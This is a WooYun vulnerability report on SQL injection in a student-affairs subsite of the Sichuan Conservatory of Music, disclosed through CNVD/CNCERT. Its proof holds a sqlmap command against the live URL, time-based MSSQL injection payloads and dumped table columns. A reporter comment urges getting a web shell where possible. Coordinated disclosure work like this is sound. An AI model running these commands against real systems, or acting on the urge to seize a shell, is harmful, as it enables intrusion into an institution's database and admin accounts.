当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0127608

漏洞标题:四川音乐学院某分站存在SQL注入

相关厂商:四川音乐学院

漏洞作者: k3m

提交时间:2015-07-20 15:33

修复时间:2015-09-07 15:04

公开时间:2015-09-07 15:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-20: 细节已通知厂商并且等待厂商处理中
2015-07-24: 厂商已经确认,细节仅向厂商公开
2015-08-03: 细节向核心白帽子及相关领域专家公开
2015-08-13: 细节向普通白帽子公开
2015-08-23: 细节向实习白帽子公开
2015-09-07: 细节向公众公开

简要描述:

存在sql注入,可获得管理员帐号.

详细说明:


四川音乐学院学工网·一切为了学生 为了学生一切
获得tables之后,跑columns使用暴力跑.

漏洞证明:

sqlmap.py -u "http://xsc.sccm.cn/xgweb/WebSite/StudentOffice/ShowOfficeNews.aspx?Id=147" --random-agent --time-sec=5000  -T 4 --columns
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: Id (GET)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: Id=147'; WAITFOR DELAY '0:0:5000'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: Id=147' WAITFOR DELAY '0:0:5000'--
---
[22:42:57] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 4.0.30319
back-end DBMS: Microsoft SQL Server 2000
Database: 4cs_#<O`
Table: 4
[30 columns]
+------------------+-------------+
| Column | Type |
+------------------+-------------+
| administrator | non-numeric |
| area_id | non-numeric |
| before | non-numeric |
| callend | non-numeric |
| capital | non-numeric |
| codigo | non-numeric |
| country_name | non-numeric |
| ct_id | non-numeric |
| digest | non-numeric |
| feedid | non-numeric |
| freeway | non-numeric |
| grupy | non-numeric |
| hk_value | non-numeric |
| kursnr | non-numeric |
| login_user | non-numeric |
| login_username | non-numeric |
| mayank | non-numeric |
| nivel | non-numeric |
| parent | non-numeric |
| prc_sconto2 | non-numeric |
| productid | non-numeric |
| rule | non-numeric |
| sal | non-numeric |
| sb_pwd | non-numeric |
| statoavanzamid | non-numeric |
| stock_unlimited | non-numeric |
| titoloprogettoid | non-numeric |
| usrn | non-numeric |
| word_id | non-numeric |
| xevento | non-numeric |
Database: 4cs_#<O`
Table: C
[18 columns]
+----------------+-------------+
| Column | Type |
+----------------+-------------+
| c_id | non-numeric |
| catalogue_id | non-numeric |
| coddoc | non-numeric |
| complet | non-numeric |
| deptname | non-numeric |
| deptno | non-numeric |
| flscrvpre | non-numeric |
| idlocation | non-numeric |
| kode | non-numeric |
| kodi | non-numeric |
| mod_customenu | non-numeric |
| mod_gtranslate | non-numeric |
| nama | non-numeric |
| nama_pengguna | non-numeric |
| namapengguna | non-numeric |
| ship | non-numeric |
| spis | non-numeric |
| startnummer | non-numeric |
+----------------+-------------+

修复方案:

过滤

版权声明:转载请注明来源 k3m@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-07-24 15:03

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给赛尔教育,由其后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-07-22 21:27 | k3m ( 路人 | Rank:6 漏洞数:3 | 谁家酱油多?请带上我)

    恩.如果可以get shell的话还是要get的,哪怕是web shell.